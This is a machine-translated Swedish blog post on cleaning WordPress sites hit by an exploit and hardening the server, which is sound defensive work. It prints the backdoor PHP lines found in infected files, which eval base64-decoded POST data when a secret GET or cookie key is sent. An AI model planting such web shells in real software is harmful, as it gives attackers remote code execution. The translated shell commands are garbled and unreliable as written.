Wordpress Exploit - Rengöring filer virus och säkerhet SQL-server.

Innan du läser detta inlägg, ska du se , För att förstå någonting. :)

Vi hittade många av de bloggar på stealthsettings.com filer, som liknar nedanstående koder som följer av virusarii med Den utnyttjar för Wordpress.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'file'])); exit; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcOm ovanstående är om filen xmlrpc.php från Sömniga, Vid en grep server, ser ut som en hel del av det här slaget i källkoder.

pppffiuuu

Rengöring infekterade filer:

Ooookkkk ...
1. Den bästa lösningen, eftersom det är gjort säkerhetskopieringOch rensade databasen är att torka filer Wordpress (Wp-config.php kan hålla filer inte strikt relaterade till wp-plattform efter noggrant kontrollerat) på servern och göra den ursprungliga upload versionen 2.5.1 (Vid detta tillfälle och göra en versionsuppgradering wp :)) http://wordpress.org/download/ . Torka inklusive temafiler om du inte litar på att du kan kontrollera dem noga.

Det verkar ha påverkats och filer av de teman som inte har använts tidigare på bloggen och helt enkelt byta temat inte löser detta problem.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' file '])); exit; ??}> <Php get_header (); ?>

2. Sök och ta bort alla filer som innehåller:... * _new.php * _old.php * Jpgg * Giff * Pngg och wp-info.txt fil, om något.

Sök. -Namn "* _new.php"
Sök. -Namn "* _old.php"
Sök. -Namn "*. Jpgg"
Sök. -Namn "* _giff"
Sök. -Namn "* _pngg"
Sök. -Namn "wp-info.txt"

3. i / Tmp , Söka och ta bort mappar som tmpYwbzT2

SQL Rengöring :

1. I tabellen tabellen wp_options Kontrollera och ta bort raderna: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Sammantaget wp_options, gå till active_plugins och ta bort om det finns en plugin som slutar i en av de förlängningar * _new.php * _old.php *. jpgg *. GIFF *. pngg eller om man misstänker en annan anknytning, kolla noga.

3. Bord wp_users, Se om det finns en användare som inte har skrivit något i sin högra, kolumnen user_nicename. Ta bort den här användaren, men notera numret på ID-kolumnen. Användaren kan använda "Wordpress" som user_login och där det är skapat på 00: 00: 00 0000-00-00.

4. Gå till tabell wp_usermeta och ta bort alla rader som hör ID ovan.

När du har gjort detta sql rengöring, inaktivera och sedan aktivera ett visst plugin. (I bloggen -> Dashboard -> Insticksprogram)

Säkra server:

1. Se vilka kataloger och filer "skrivbar"(Chmod 777) och försöka sätta på dem en chmod som inte skulle låta sitt skrivande på någon nivå. (644 chmod, till exempel)

Sök. -Perm-2-ls

2. Se vad som är filer sattes bit suid eller SGID . Om du inte använder dessa filer sätta på dem chmod 0 eller avinstallera det paket som den innehåller. De är mycket farliga eftersom de utför privilegier "grupp"Eller"rot"Och inte med normala användarrättigheter för att köra den filen.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Kolla vilka portar är öppna och försöker stänga eller fästa de som inte används.

netstat-an | grep-i lyssnar

Så mycket. Jag ser Google Search och andra säger "Tja du gjorde !!!". Tja bra jag har gjort det ... men du vet om Google börjar att förbjuda alla platser formning SE SPAM och satte trojan (Trojan.Clicker.HTML) I cookies?

Wordpress Exploit - Rengöring filer virus och säkerhet SQL-server.

Om författaren

Stealth

Brinner för allt som gadget och IT skriver gärna stealthsettings.com av 2006 och jag gillar att upptäcka nya saker med dig om datorer och MacOS, Linux, Windows, iOS och Android.

1 Kommentar

Lämna en kommentar

Den här sidan använder Akismet för att minska spam. Läs om hur din kommentardata behandlas.